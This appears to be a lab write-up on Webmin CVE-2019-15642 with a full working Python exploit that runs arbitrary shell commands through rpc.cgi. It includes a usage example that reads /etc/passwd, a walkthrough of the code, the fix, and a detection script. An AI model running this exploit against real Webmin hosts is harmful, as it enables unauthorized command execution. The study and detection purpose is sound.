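Webmin remote code execution (CVE-2019-15642)
Description: vulfocus/webmin-cve_2019_15642
Affected versions: [Webmin <= 1.920]
How the vulnerability works:
A deserialization vulnerability exists in the rawarg function.
Triggering it requires two preconditions:
- The User-Agent is set to "webmin" (Webmin interprets this as a login that uses Basic auth instead of a session cookie);
- Valid Basic credentials for a Webmin user (for example, a newly created user "toto" with default permissions).
Once both conditions are met, we can go further and look around. The unserialized variable is in web-lib-funcs.pl:
Exploitation:
The PoC was found here
The code is as follows: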
import requests
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import sys
import base64
import re
banner = '''
_______ ________ ___ ___ __ ___ __ _____ __ _ _ ___
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ | ____| / /| || |__ \
| | \ \ / /| |__ ______ ) | | | || | (_) |______| | |__ / /_| || |_ ) |
| | \ \/ / | __|______/ /| | | || |\__, |______| |___ \| '_ \__ _/ /
| |____ \ / | |____ / /_| |_| || | / / | |___) | (_) | | |/ /_
\_____| \/ |______| |____|\___/ |_| /_/ |_|____/ \___/ |_|____|
python by jas502n
Webmin RCE (Need Authorization)
usage: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd"
'''
def CVE_2019_15642(url, auth_base64, cmd):
    vuln_url = url + '/rpc.cgi'
    # The "webmin" User-Agent makes Webmin accept Basic auth instead of a session cookie
    headers = {
        "User-Agent": "webmin",
        "Connection": "close",
        "Content-Type": "application/x-www-form-urlencoded",
        "Authorization": "Basic %s" % auth_base64,
        "Content-Length": "70"
    }
    # Defined by the PoC but never passed to requests.post
    proxies = {
        'http': 'socks5h://127.0.0.1:1080',
        'https': "socks5h://127.0.0.1:1080"
    }
    payload = r'OBJECT CGI;print "Content-Type: Test\n\n";' + '$cmd=`%s`;print "$cmd";' % cmd
    print("payload= %s" % payload)
    r = requests.post(url=vuln_url, data=payload, headers=headers, verify=False)
    if r.status_code == 200 and 'Content-type' in r.text:
        print("\nVuln_Url= %s\n" % vuln_url)
        # Everything before the trailing text/plain header is the command output
        m = re.findall(r"(.+?)\nContent-type: text/plain", r.text, re.S)
        print(">>>Execute Response: \n%s" % m[0])
    else:
        print("No Vuln Exit!")


if __name__ == '__main__':
    print(banner)
    username = input("Please Input Webmin Username: ")
    password = input("Please Input Webmin Password: ")
    auth = username + ':' + password
    # b64encode works on bytes; decode the result so it can go into the header string
    auth_base64 = base64.b64encode(auth.encode()).decode()
    print('\n>>>Authorization: Basic %s\n' % auth_base64)
    url = sys.argv[1]
    cmd = sys.argv[2]
    CVE_2019_15642(url, auth_base64, cmd)
Usage:
python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd"
Manually, as follows: the User-Agent must be changed and the root-root account used
Analysis of the PoC code
def CVE_2019_15642(url, auth_base64, cmd):
    vuln_url = url + '/rpc.cgi'
    headers = {
        "User-Agent": "webmin",
        "Connection": "close",
        "Content-Type": "application/x-www-form-urlencoded",
        "Authorization": "Basic %s" % auth_base64,
        "Content-Length": "70"
    }
The request headers specify "User-Agent": "webmin".
    payload = r'OBJECT CGI;print "Content-Type: Test\n\n";' + '$cmd=`%s`;print "$cmd";' % cmd
This is the payload.
    r = requests.post(url=vuln_url, data=payload, headers=headers, verify=False)
    if r.status_code == 200 and 'Content-type' in r.text:
        print("\nVuln_Url= %s\n" % vuln_url)
        m = re.findall(r"(.+?)\nContent-type: text/plain", r.text, re.S)
        print(">>>Execute Response: \n%s" % m[0])
    else:
        print("No Vuln Exit!")
This part scrapes the command output from the response.
    username = input("Please Input Webmin Username: ")
    password = input("Please Input Webmin Password: ")
    auth = username + ':' + password
    auth_base64 = base64.b64encode(auth.encode()).decode()
    print('\n>>>Authorization: Basic %s\n' % auth_base64)
    url = sys.argv[1]
    cmd = sys.argv[2]
    CVE_2019_15642(url, auth_base64, cmd)
This part follows the encoding that the login protocol requires.
Fix:
Update to a newer version.
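Until the update is applied, requests shaped like the PoC above can be flagged in captured traffic or proxy logs. The following detection sketch is an added example, not part of the original post or of Webmin; it assumes the class token after OBJECT ends at the first comma and that a legitimate token is a plain Perl package name, and the sample requests, host name and password are constructed.

```python
import re
from urllib.parse import unquote

# Assumption: a legitimate class token is a plain Perl package name (e.g. Foo::Bar).
PKG_NAME = re.compile(r"[A-Za-z_]\w*(?:::\w+)*\Z", re.ASCII)
OBJECT_RE = re.compile(r"\s*OBJECT\s+([^,]*)")

def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers, body

def classify(raw):
    """Return 'ignore', 'rpc-basic-auth' or 'object-injection' for one request."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or not path.endswith("/rpc.cgi"):
        return "ignore"
    m = OBJECT_RE.match(body)
    # Percent-decode the token so encoded metacharacters are still caught.
    if m and not PKG_NAME.match(unquote(m.group(1)).strip()):
        return "object-injection"
    ua_webmin = headers.get("user-agent", "").lower() == "webmin"
    basic = headers.get("authorization", "").lower().startswith("basic ")
    return "rpc-basic-auth" if ua_webmin and basic else "ignore"

def build(method, path, body=""):
    # Constructed sample request; host and credentials are placeholders.
    return (f"{method} {path} HTTP/1.1\r\nHost: webmin.example:10000\r\n"
            "User-Agent: webmin\r\nAuthorization: Basic dG90bzp0b3Rv\r\n\r\n" + body)

SAMPLES = {
    "poc-shaped": build("POST", "/rpc.cgi",
        'OBJECT CGI;print "Content-Type: Test\\n\\n";$cmd=`id`;print "$cmd";'),
    "plain-class": build("POST", "/rpc.cgi", "OBJECT Foo::Bar,a,VAL"),
    "other-page": build("GET", "/index.cgi"),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:12} -> {classify(raw)}")
```

A "rpc-basic-auth" result is not an attack by itself, but on hosts that do not use Webmin RPC it is worth reviewing alongside the account that authenticated.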